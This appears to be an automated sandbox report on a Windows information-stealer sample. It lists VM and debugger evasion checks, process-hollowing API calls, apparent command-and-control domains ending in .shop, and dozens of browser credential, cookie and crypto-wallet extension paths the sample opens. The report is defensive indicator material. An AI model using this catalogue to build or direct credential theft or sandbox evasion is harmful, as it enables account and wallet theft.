                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 22C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 6756Thread sleep time: -150000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: Amcache.hve.5.drBinary or memory string: VMware
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: file.exe, 00000002.00000002.1878693850.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878577989.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00442080 LdrInitializeThunk,2_2_00442080
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024F7F41 mov edi, dword ptr fs:[00000030h]0_2_024F7F41
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024F80BE mov edi, dword ptr fs:[00000030h]0_2_024F80BE
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024F7F41 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_024F7F41
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.100000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.34f9550.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.34f9550.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
